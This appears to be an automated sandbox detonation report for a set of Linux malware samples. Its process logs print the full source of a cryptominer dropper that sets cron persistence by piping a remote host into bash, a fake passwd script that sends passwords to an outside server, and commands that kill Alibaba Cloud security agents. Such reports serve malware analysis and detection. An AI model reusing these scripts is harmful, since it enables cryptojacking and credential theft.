File opened for reading /proc/580/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1915/stat /usr/bin/pgrep N/A
File opened for reading /proc/511/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1824/stat /usr/bin/pgrep N/A
File opened for reading /proc/1824/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1900/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2439/status /usr/bin/pgrep N/A
File opened for reading /proc/458/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/776/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1957/status /usr/bin/pgrep N/A
File opened for reading /proc/2379/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/35/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1903/status /usr/bin/pgrep N/A
File opened for reading /proc/2444/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/3/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/199/stat /usr/bin/pgrep N/A
File opened for reading /proc/10/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/22/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1764/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2234/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/138/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2200/status /usr/bin/pgrep N/A
File opened for reading /proc/2378/cmdline /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." 
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

9s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240418-en

Max time kernel

140s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 45.10.20.100:1010 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240729-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20241023-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\xrx\config.json"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 440823ad7fa615c7d769b03ca7221578
SHA1 9a866866eb8cd5a27e8ffbee63e22aaeb5895075
SHA256 46a3d081a71a3ccfa1f07a3d7594af2eaa5c2c9c75f7301c2140cd1a5664b42f
SHA512 b9293c8ca8f35e3acb5fbff241ca0b0903e3bfef1b27aa1882369a9acf059d3edf03d8f1a660da3978f9e7a2b8ecb2e7043c69db823ace1cef4e08f94487208c

Analysis: behavioral23

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

140s

Max time network

131s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240729-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

128s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country  Destination          Domain                      Proto
N/A      224.0.0.251:5353     N/A                         udp
US       151.101.193.91:443   N/A                         tcp
GB       185.125.188.62:443   N/A                         tcp
GB       185.125.188.61:443   N/A                         tcp
US       151.101.193.91:443   N/A                         tcp
GB       89.187.167.7:443     N/A                         tcp
US       1.1.1.1:53           1527653184.rsc.cdn77.org    udp
US       1.1.1.1:53           1527653184.rsc.cdn77.org    udp
GB       84.17.50.8:443       1527653184.rsc.cdn77.org    tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240226-en

Max time kernel

25s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/usr/bin/lsb_release

[lsb_release -a]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country  Destination          Domain                      Proto
N/A      224.0.0.251:5353     N/A                         udp
GB       185.125.188.61:443   N/A                         tcp
GB       185.125.188.61:443   N/A                         tcp
US       151.101.193.91:443   N/A                         tcp
US       151.101.193.91:443   N/A                         tcp
GB       195.181.164.14:443   N/A                         tcp
US       1.1.1.1:53           1527653184.rsc.cdn77.org    udp
US       1.1.1.1:53           1527653184.rsc.cdn77.org    udp
GB       84.17.50.8:443       1527653184.rsc.cdn77.org    tcp

Files

N/A